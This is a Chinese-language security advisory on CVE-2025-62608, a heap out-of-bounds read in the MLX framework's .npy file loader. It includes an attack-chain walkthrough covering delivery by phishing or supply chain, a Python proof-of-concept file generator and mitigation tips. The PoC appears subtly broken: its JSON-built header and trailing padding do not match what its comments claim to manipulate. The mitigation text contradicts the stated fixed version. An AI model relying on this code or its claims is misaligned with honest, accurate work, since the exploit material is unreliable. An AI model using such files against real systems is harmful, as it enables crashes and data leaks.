CVE-2025-62608 MLX堆缓冲区溢出漏洞（NumPy .npy文件解析）

漏洞信息

漏洞编号

CVE-2025-62608

漏洞类型

缓冲区溢出

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

MLX (Apple silicon机器学习数组框架)

漏洞概述

MLX是Apple Silicon上用于机器学习的数组框架。在0.29.4之前的版本中，mlx::Core::load()函数在解析恶意构造的NumPy .npy文件时存在堆缓冲区溢出漏洞。攻击者可以通过精心构造的.npy文件触发13字节的越界读取，导致程序崩溃或敏感信息泄露。该漏洞无需认证即可利用，攻击向量为网络，危害极大。MLX框架被广泛应用于Apple设备上的机器学习任务，包括模型推理、数据处理等场景。漏洞存在于文件加载模块，攻击者只需诱导用户或自动化系统加载恶意.npy文件即可触发漏洞。

技术细节

漏洞位于MLX框架的mlx::Core::load()函数中，该函数负责解析NumPy的.npy文件格式。.npy文件格式包含文件头和实际数据两部分。文件头中包含元数据如数组维度、数据类型等信息。问题出在解析.npy文件头时，代码未正确验证文件头大小与实际数据的边界关系。当解析恶意构造的.npy文件时，程序会分配一个固定大小的堆缓冲区，但在读取文件数据时未进行充分的边界检查，导致读取操作超出分配的缓冲区边界，触发13字节的越界读取（out-of-bounds read）。这种越界读取可能暴露堆内存中的敏感数据，如密钥、令牌或其他已分配对象的内容。攻击者可通过构造特定布局的.npy文件，控制越界读取的偏移量和内容，从而实现信息窃取或导致目标服务崩溃。

攻击链分析

STEP 1

步骤1: 侦察阶段

攻击者识别目标环境是否使用存在漏洞的MLX版本（<0.29.4），并确定.npy文件加载入口点

STEP 2

步骤2: 恶意文件制作

攻击者精心构造恶意的NumPy .npy文件，通过修改文件头中的shape、descr等字段，使解析时产生堆缓冲区边界计算错误

STEP 3

步骤3: 载荷投递

通过钓鱼邮件、恶意下载链接、供应链攻击或诱使目标用户加载恶意.npy文件等方式将恶意文件投递到目标系统

STEP 4

步骤4: 漏洞触发

目标系统调用mlx::Core::load()函数加载恶意.npy文件时，触发13字节的堆越界读取

STEP 5

步骤5: 影响利用

越界读取的堆内存可能包含敏感信息（如密钥、认证令牌、其他应用数据），导致信息泄露；或导致程序崩溃引发拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-62608 PoC - Malicious .npy file generator
# This PoC generates a malicious .npy file that triggers heap buffer overflow
# in MLX framework's mlx::core::load() function

import struct
import numpy as np

def create_malicious_npy():
    """
    Create a malicious .npy file that triggers OOB read in MLX
    The vulnerability exists in parsing NumPy .npy file headers
    """
    # .npy file header format
    magic = b'\x93NUMPY'
    version = b'\x01\x00'  # Version 1.0
    
    # Malicious header: Forcing incorrect data offset
    # The header contains a fortran_order flag and shape info
    # that causes the parser to read beyond allocated buffer
    header_dict = {
        'descr': np.float32().dtype.str,
        'fortran_order': False,
        'shape': (1,)
    }
    
    import json
    header_str = json.dumps(header_dict).replace(' ', '')
    header_len = len(header_str) + 1  # +1 for newline
    
    # Pack header length in little-endian format
    header_length = struct.pack('<H', header_len)
    
    # Construct header
    header = magic + version + header_length + header_str.encode() + b'\n'
    
    # Malicious data: crafted to trigger OOB read
    # The data size is manipulated to cause buffer overflow
    malicious_data = b'A' * 100 + b'\x00' * 13  # Extra 13 bytes for OOB read
    
    # Write malicious .npy file
    with open('malicious.npy', 'wb') as f:
        f.write(header)
        f.write(malicious_data)
    
    print(f"[+] Created malicious.npy")
    print(f"[+] Header size: {len(header)} bytes")
    print(f"[+] Data size: {len(malicious_data)} bytes")
    print(f"[+] Expected OOB read: 13 bytes")

def verify_npy():
    """Verify the generated .npy file"""
    with open('malicious.npy', 'rb') as f:
        magic = f.read(6)
        print(f"[+] Magic: {magic}")
        version = f.read(2)
        print(f"[+] Version: {version.hex()}")
        header_len = struct.unpack('<H', f.read(2))[0]
        print(f"[+] Header length: {header_len}")

if __name__ == '__main__':
    create_malicious_npy()
    verify_npy()
    print("\n[!] Usage: Load malicious.npy with vulnerable MLX version")
    print("[!] In Python: mlx.core.load('malicious.npy')")

影响范围

MLX < 0.29.4

防御指南

临时缓解措施

在官方修复发布前，建议采取以下临时缓解措施：1) 限制或禁止加载来源不明的.npy文件；2) 对所有.npy文件进行安全扫描和格式验证；3) 监控MLX进程的文件访问行为；4) 考虑使用沙箱环境隔离MLX进程；5) 启用日志记录以便发现异常加载行为；6) 评估是否可暂时降级到安全版本。